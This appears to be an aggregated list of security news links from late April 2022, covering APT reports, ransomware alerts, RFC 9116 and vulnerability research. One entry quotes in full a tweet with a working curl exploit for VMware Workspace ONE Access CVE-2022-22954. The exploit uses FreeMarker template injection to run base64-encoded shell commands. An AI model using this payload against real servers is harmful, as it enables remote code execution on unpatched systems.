RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
https://www.rfc-editor.org/rfc/rfc9116
The hybrid war in Ukraine - Microsoft On the Issues
https://blogs.microsoft.com/on-the-issues/2022/04/27/hybrid-war-ukraine-russia-cyberattacks/
Defence Evasion Technique: Timestomping Detection – NTFS Forensics
https://bit.ly/3KsX1ua
Trello From the Other Side: Tracking APT29 Phishing Campaigns | Mandiant
https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns
Elon Musk on Twitter: "Twitter DMs should have end to end encryption like Signal, so no one can spy on or hack your messages" / Twitter
https://twitter.com/elonmusk/status/1519469891455234048
Wiz Research discovers "ExtraReplica"— a cross-account database vulnerability in Azure PostgreSQL | Wiz Blog
https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/
Ed on Twitter: "After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: https://t.co/uIqSRo28ak. I would like to use this opportunity to thank those who made this possible. Thank you. ❤️ https://t.co/Z8SNxd81ZO" / Twitter
https://twitter.com/EdOverflow/status/1519415583896481792
Bypassing LDAP Channel Binding with StartTLS - Almond Offensive Security Blog
https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html
Threat Insight on Twitter: "Starting in March 2022, Proofpoint observed campaigns delivering a new downloader called #Bumblebee. Threat actors using Bumblebee are associated with #malware payloads that have been linked to follow-on #ransomware campaigns. 🐝...🐝... Learn more: https://t.co/Q4XpNwb8tB https://t.co/jxLRucgVAb" / Twitter
https://twitter.com/threatinsight/status/1519616167572393986
Austin Peay State University on Twitter: "APSU ALERT: Ransom ware attack. THIS IS NOT A TEST. SHUT DOWN ALL COMPUTERS NOW!" / Twitter
https://twitter.com/austinpeay/status/1519399475785125889
Devil in the Details: Why Legacy Breach and Attack Simulation (BAS) Falls Short
https://event.on24.com/wcc/r/3736885/FEA7E6A772F7BD99CF3DE208634D66E8?partnerref=partner2
BSides Las Vegas
http://BSidesLV.org
Beware: Onyx ransomware destroys files instead of encrypting them
https://www.bleepingcomputer.com/news/security/psa-onyx-ransomware-destroys-large-files-instead-of-encrypting-them/
Elon Musk on Twitter: "Next I’m buying Coca-Cola to put the cocaine back in" / Twitter
https://twitter.com/elonmusk/status/1519480761749016577
U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities
https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html
Convert binary to a shellcode with donut and create a C# self injector from it via a combo of "Dynamic P/Invoke + H/Invoke" calls · GitHub
https://gist.github.com/snovvcrash/30bd25b1a5a18d8bb7ce3bb8dc2bae37
wvu on Twitter: "Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'" / Twitter
https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
The origin story of APT32 macros: The StrikeSuit Gift that keeps giving - Stairwell
https://stairwell.com/news/threat-research-the-origin-story-of-apt32-macros-strikesuit-gift/
New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware
http://research.trendmicro.com/earthberberoka
illegalFawn on Twitter: "@Atlassian @Bitbucket @AskAtlassian the reported last week #phishing sites are still active! how can it be? please act asap https://t.co/W0EanO5Lo8 @malwrhunterteam @JAMESWT_MHT @Bank_Security @JCyberSec_ @dubstard @YourAnonRiots @andsyn1 @douglasmun @SwiftOnSecurity" / Twitter
https://twitter.com/illegalFawn/status/1518842603114045440
A lookback under the TA410 umbrella: Its cyberespionage TTPs and activity | WeLiveSecurity
https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/
Private equity executive sought to undermine NSO critics, data suggests | Canada | The Guardian
https://www.theguardian.com/world/2022/apr/28/private-equity-executive-sought-to-undermine-nso-critics-data-suggests
facts: Bug Bounty hunters has made ridiculous amounts of $$ from known DNS techniques.. - YouTube
https://youtu.be/GRv-O-Hq9Io
BSides Las Vegas on Twitter: "Thank you for your patience! We are thrilled to announce that the #BSidesLV website has been updated with all the information you need for 2022! We’re sure you have tons of questions; get your answers at https://t.co/i46Yvno5vq https://t.co/MmfwsdfbZN" / Twitter
https://twitter.com/BSidesLV/status/1519679078353231876
This isn't Optimus Prime's Bumblebee but it's Still Transforming | Proofpoint US
http://ow.ly/pIRG50IU0ZK
Page not found · GitHub · GitHub
https://github.com/SecIdiot/minbeacon
Demystifying Cybersecurity: How Mari Galloway and Other Women Are Creating Their Own Careers in Cyber - Ms. Magazine
https://msmagazine.com/2022/04/27/cybersecurity-jobs-career-mari-galloway-women-technology-stem/